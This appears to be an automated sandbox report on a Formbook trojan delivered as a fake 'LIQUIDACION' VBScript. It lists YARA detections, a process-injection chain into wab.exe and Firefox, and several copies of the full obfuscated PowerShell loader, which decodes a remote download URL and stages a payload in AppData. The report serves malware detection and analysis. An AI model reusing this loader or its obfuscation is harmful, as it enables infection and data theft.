        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1F9212_2_246D1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D284012_2_246D2840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DA84012_2_246DA840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D38E012_2_246D38E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE8F012_2_246FE8F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B68B812_2_246B68B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E696212_2_246E6962
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D995012_2_246D9950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EB95012_2_246EB950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D29A012_2_246D29A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479A9A612_2_2479A9A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24743A6C12_2_24743A6C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478FA4912_2_2478FA49
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24787A4612_2_24787A46
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477DAC612_2_2477DAC6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24715AA012_2_24715AA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476DAAC12_2_2476DAAC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CEA8012_2_246CEA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478FB7612_2_2478FB76
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478AB4012_2_2478AB40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2470DBF912_2_2470DBF9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24786BD712_2_24786BD7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EFB8012_2_246EFB80
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058BA4D916_2_058BA4D9
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058BA4E016_2_058BA4E0
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B878016_2_058B8780
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058BA70016_2_058BA700
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C0E1A16_2_058C0E1A
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C0E6016_2_058C0E60
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058D7E6016_2_058D7E60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 24705130 appears 36 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 24717E54 appears 88 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2473EA12 appears 80 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2474F290 appears 103 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 246BB970 appears 266 times
        Source: 1000901 LIQUIDACION.vbsInitial sample: Strings found which are bigger than 50
        Source: amsi64_7500.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: amsi32_7728.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@23/8@4/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Medikamentel.DdgJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no41w1de.rju.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7500
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7728
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe GJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe GJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
